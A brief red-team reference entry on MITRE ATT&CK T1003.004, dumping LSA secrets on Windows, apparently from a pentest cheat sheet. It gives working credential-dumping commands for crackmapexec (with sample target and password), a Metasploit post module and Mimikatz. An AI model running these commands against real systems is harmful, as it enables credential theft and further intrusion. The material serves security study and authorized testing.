LSA Secrets

https://attack.mitre.org/techniques/T1003/004/

ATT&CK ID: T1003.004

Permissions Required: SYSTEM

Description

Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts. LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets. LSA secrets can also be dumped from memory.

Techniques

Crackmapexec

crackmapexec smb '10.10.10.100' -u 'moe' -p 'Password123' --lsa

Metasploit

use post/windows/gather/lsa_secrets

Mimikatz

Invoke-Mimikatz -Command '"token::elevate" "lsadump::secrets"'